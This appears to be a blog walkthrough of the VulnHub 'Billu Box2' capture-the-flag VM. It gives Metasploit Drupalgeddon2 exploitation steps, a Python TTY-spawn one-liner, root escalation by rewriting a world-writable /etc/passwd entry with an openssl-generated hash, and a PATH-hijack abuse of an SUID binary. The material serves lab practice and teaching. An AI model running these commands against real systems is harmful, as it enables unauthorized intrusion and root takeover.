Hello freinds!! Today we are
going to solve latest CTF challenge “Billu Box2” presented by vulnhub for
penetration practice and design by Manish Kishan Tanwar. This virtual machine
is having intermediate to medium difficulty level. One need to break into VM
using web application and from there escalate privileges to gain root access.
Penetration Methodologies
§ Network scaning
§ Exploit Drupal (Metasploit)
§ privilege escalation via Writable /passwd file
§ Get root access and capture the flag
Let’s Begin!!
You will get target VM
machine IP at the time of boot-up as you can observe we have it as
192.168.1.108.
So let’s start with nmap port enumeration and execute
following command in our terminal.
nmap -A 192.168.1.108
Here I noticed drupal 8 CMS is running through
apache and might be you are knowing that metasploit contains a module to
compromise the target by exploiting drupalgeddon.
So let’s try to exploit this web application with the help
of metasploit module and for that execute following command:
use exploit/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > set
rhost 192.168.1.108
msf exploit(unix/webapp/drupal_drupalgeddon2)> exploit
Yippee!! We have owned meterpreter session 1, now let’s go
for privilege escalation. Firstly let access proper tty shell with help of
python one-liner and identify kernel version.
python -c 'import
pty;pty.spawn("/bin/sh")'
lsb_release -a
I search for any relative kernel
exploit but didn’t found any working exploit so I penetrated little bit more
and enumerated that the /passwd file has ALL 777 permission as shown in the
below image.
With help of cat command we open
/etc/passwd file and notice an entry for local user “indishell” inside it. Since
this file has ALL permission which mean I can modify it very easily. So I
copied the whole /passwd file in an empty text file in our local machine and
saved at /root/Desktop/passwd.
As you can observe the entry for user indishell contain
encrypted passwd and I don’t know which encryption is used therefore I will try
to replace the original salt password. We can use openssl command which will
generate an encrypted password with salt.
openssl passwd -1
-salt abc pass123
Now copy it which is new salt password for password:pass123 and paste at the place of
original salt password for user indishell.
As you can observe, we had manipulated old password hash
from our new password salt and also modify UID GID as 0:0 to make him member of root user.
Now transfer your modified passwd file into target’s VM
machine and follow below steps to access root shell terminal.
cd /etc
upload
/root/Desktop/passwd
python -c 'import
pty;pty.spawn("/bin/sh")'
su indishell
whoami
B000M!!!! We hit the Goal and got root access of this VM.
This vulnerability can be exploit in multiple way and for detail open this
link: http://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/
Search for the file having SUID or 4000
permission with help of Find command.
find /
-perm -u=s -type f 2>/dev/null
Here I found SUID bit is enable for a file named
as “s” which is present inside /opt
directory, on its execution we realize that, it is an SCP file which is asking
SSH authentication.
Hence, now we can modify this file to get bash shell with
the help of following step which is also known Path Variable privilege
Escalation.
cd /tmp
echo “/bin/sh”
> scp
chmod 7777scp
export
PATH=/tmp:$PATH
cd /opt
./s
id
This vulnerability can be exploit in multiple way and for
detail open this link: http://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
0 comments:
Post a Comment